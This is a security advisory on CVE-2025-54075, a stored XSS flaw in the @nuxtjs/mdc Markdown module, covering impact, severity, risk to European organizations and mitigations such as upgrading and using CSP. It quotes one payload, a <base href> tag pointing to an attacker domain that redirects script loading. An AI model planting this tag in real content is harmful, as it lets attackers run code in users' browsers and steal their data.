CVE-2025-54075 is a high-severity stored cross-site scripting (XSS) vulnerability affecting versions of the @nuxtjs/mdc module prior to 0.17.2. MDC is a tool designed to convert Markdown documents into interactive content by deeply integrating with Vue components. The vulnerability arises from improper neutralization of input during web page generation, specifically allowing a Markdown author to inject a <base href="https://attacker.tld"> HTML element. The <base> tag modifies the resolution of all subsequent relative URLs on the page, enabling an attacker to redirect resource loading (scripts, stylesheets, images) to an attacker-controlled domain. This can lead to execution of arbitrary JavaScript within the context of the vulnerable site, compromising confidentiality, integrity, and availability of the web application and its users. The vulnerability requires no authentication or user interaction and can be exploited remotely by submitting malicious Markdown content that is rendered by the vulnerable module. The CVSS v3.1 score of 8.3 reflects the network attack vector, low attack complexity, no privileges or user interaction required, and a scope change that affects resources beyond the vulnerable component. Although no known exploits are currently reported in the wild, the nature of the vulnerability and its ease of exploitation make it a significant risk. The issue was addressed in version 0.17.2 of the @nuxtjs/mdc module by properly sanitizing or restricting the injection of <base> elements in Markdown content, preventing attackers from manipulating resource loading and script execution.

For European organizations, this vulnerability poses a serious threat especially to those using the @nuxtjs/mdc module in their web applications or documentation platforms. Exploitation could lead to unauthorized script execution, enabling attackers to steal sensitive user data such as authentication tokens, perform actions on behalf of users, or deliver further malware payloads. This can result in data breaches, reputational damage, regulatory non-compliance (e.g., GDPR violations), and service disruption. Since the vulnerability affects the rendering of Markdown content, any system that allows user-generated or third-party Markdown input without strict validation is at risk. Attackers could leverage this to target internal tools, customer-facing portals, or developer documentation sites. The ability to manipulate the <base> tag also increases the attack surface by redirecting resource loading, potentially bypassing content security policies or other defenses. Given the widespread use of Vue.js and Nuxt.js frameworks in Europe, especially in technology, finance, and government sectors, the impact could be significant if not promptly mitigated.

European organizations should immediately upgrade the @nuxtjs/mdc module to version 0.17.2 or later to apply the official fix. Additionally, they should audit all systems that render Markdown content to ensure no untrusted input can inject HTML elements like <base>. Implement strict input validation and sanitization on Markdown inputs, possibly using a whitelist approach to allowed tags and attributes. Employ Content Security Policy (CSP) headers that restrict script and resource loading to trusted domains, mitigating the impact of any injected malicious URLs. Regularly review and monitor logs for unusual requests or content submissions that could indicate exploitation attempts. For internal tools, consider restricting Markdown editing permissions to trusted users only. Finally, conduct security awareness training for developers and content authors about the risks of injecting raw HTML in Markdown and the importance of using updated libraries.